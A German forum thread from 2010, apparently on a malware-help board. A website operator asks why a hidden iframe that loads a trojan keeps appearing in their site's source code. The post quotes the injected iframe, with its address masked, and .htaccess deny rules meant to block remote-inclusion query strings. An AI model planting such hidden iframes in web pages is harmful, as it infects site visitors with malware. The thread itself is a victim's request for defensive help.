| |
| |||||||
Plagegeister aller Art und deren Bekämpfung: Trojaner wird per iframe auf Website eingebundenWindows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen. |
 |
05.10.2010, 19:35
| #1 |
| |  Trojaner wird per iframe auf Website eingebunden Hallo zusammen, mein Problem hat weniger in einem infizierten PC zu tun, sondern mit einer Website, die einen Trojaner verbreitet. Sachverhalt ist folgender: Auf der Website hxxp://xxx.tus-obermuenstertal.de wird seit ca. 1 Woche im Seitenquelltext ein Code:
ATTFilter <iframe src="hxxp://****/download/index.php?next=4&acc=170&action=cleaner&offset=1&xml=hidden" style="display:none"></iframe>
Diese Links wechseln auch, es sind nicht immer die gleichen. Dieser ladet dann einen Trojaner auf den Dektop. Siehe Anhang „2010-09-28 Virus log.txt“ Das Problem, bzw. die Schwierigkeit den fehlerhaften Code zu finden, ist das der Fehler nicht reproduzierbar ist. Der iframe wird nur sehr selten (ca. 1x am Tag) eingebunden. Soweit zu den Folgen, weiter mit den Lösungsansätzen: Im ersten Schritt wurde von uns die Datenbank und der Server nach Auffälligkeiten gescannt. Auch die ftp Logs ergaben keine Auffälligkeiten. Die Templates, html, php und css Dateien sind auch in Ordnung. Als nächstens ein Anruf beim Serverbetreiber, der sich freundlicherweise dem Problem annahm und nochmals die Datenbank und ftp Inhalte nach „iframe“ bzw. „iframe =scr“ gescannt hat. Wieder keine Lösung gefunden. Hierbei wurde vom Support die .htaccess Datei mit folgenden Einträgen ergänzt: Code:
ATTFilter RewriteCond %{QUERY_STRING} (.*)=http(.*) [NC,OR]
RewriteCond %{QUERY_STRING} (.*)=ftp(.*) [NC,OR]
RewriteCond %{QUERY_STRING} (.*)urlx=(.*) [NC]
RewriteRule ^(.*) - [F]
Dann wurde von uns der komplette Seiteninhalt lokal mit mehreren Virenscannern duchleuchtet und auch nichts gefunden. Da ich momentan bin ich wirklich ratlos wie der Schadcode auf die Seite kommen kann, würde ich mich über Ratschläge, Tipps, oder mögliche Lösungswege sehr freuen. |
|
06.10.2010, 19:10
| #2 |
| | Trojaner wird per iframe auf Website eingebunden Hallo,
__________________die Lösung des Problems ist in folgendem Beitrag zu lesen: hxxp://modxcms.com/forums/index.php/topic,52543.0.html Grüße, Tribun |
|
| Themen zu Trojaner wird per iframe auf Website eingebunden |
| cleaner, code, css, dateien, einträge, folge, ftp, hallo zusammen, html, infizierte, links, lokal, nichts, problem, quelltext, ratlos, scanner, schadcode, seite, server, tan, tipps, trojaner, virenscanner, virus, wechseln |
Linear-Darstellung
